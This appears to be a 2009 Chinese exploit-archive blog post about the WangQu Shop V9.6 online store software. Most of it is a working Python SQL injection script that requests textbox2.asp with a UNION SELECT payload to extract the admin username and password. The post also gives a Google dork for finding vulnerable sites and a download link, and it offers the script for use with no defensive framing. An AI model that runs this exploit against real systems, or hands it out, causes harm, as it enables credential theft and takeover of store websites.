网趣购物商城V9.6SQL注入利程序

2009, December 20, 10:17 AM. 漏洞集研
Submitted by admin

################################################################################
#                 网趣购物商城V9.6SQL注入利程序
#              NaMe:WangQu Shop V9.6 SQL Injection Vulnerability
#              Author : shaun
#              Blog : www.virusest.com
#              Contact : virusest@gmail.com  QQ:403688546
#              Google Dork : inurl:class.asp?lx+anid
#              Script site : http://www.cnhww.com/
#              Date : 20/12/2009
################################################################################

import sys
import os
import time
import http.client

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)


if len(sys.argv) != 2:
    print("\n-----------------------------------------------------------------")
    print("| virusest@gmail.com                                              |")
    print("| 12/09    WangQU shop SQL Injection Tool                         |")
    print("| Help: 1.py -h                                                   |")
    print("| Visit www.virusest.com                                          |")
    print("|---------------------------------------------------------------|\n")
    sys.exit(1)

for arg in sys.argv:
    if arg == '-h':
        print("\n-------------------------------------------------------------")
        print("| virusest[@]gmail[dot]com                                    |")
        print("| 12/09  WangQU shop SQL Injection Tool                       |")
        print("| Usage: 1.py www.site.com newsid                             |")
        print("| Example: 1.py www.virusest.com 65                           |")
        print("| Visit www.virusest.com                                      |")
        print("|------------------------------------------------------------|\n")
        sys.exit(1)

site = sys.argv[1].replace("http://","").rsplit("/",1)[0]
site = site.lower()


injecturl = '/textbox2.asp?action=modify&newsid=65%20and%201=2%20union%20select%201,2,admin%2Bpassword,4,5,6,7,8%20from%20cnhww'


print("\n--------------------------------------------------------------------------------")
print("|              virusest@gmail.com                                                |")
print("|              12/09  WangQU shop SQL Injection Tool                             |")
print("|              Visit www.virusest.com                                            |")
print("\n[-] %s" % time.strftime("%X"))
print("[+] Target:",site)
print("[+] Cracking,wait.....")


try:
    conn = http.client.HTTPConnection(site)
       
    conn.request("Get",injecturl)
    response = conn.getresponse()
    page = response.read()
    response.close()
    print(page)

except(KeyboardInterrupt,SystemExit):
    raise
except:
    print("cancel")
    pass
大小: 48.88 K 尺寸: 500 x 325 浏览: 51 次 点击打开新窗口浏览全图

[URL=upload/200912200059521875.rar]Download Me[/URL]
Developed under Phyton ver 3.1, Make sure you have installed it Before using。

Tags: 网趣

« 上一篇 | 下一篇 »

只显示10条记录相关文章
网趣网站管理系统--上传漏洞 (浏览: 13608, 评论: 0)
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12720, 评论: 0)
网趣网上购物系统时尚版V9.7注入漏洞--price.asp (浏览: 11292, 评论: 0)
网趣网上购物系统HTML静态版 v2010 注射 (浏览: 15968, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12482, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9934, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统时尚版v3.0注册注射漏洞 (浏览: 10194, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7960, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):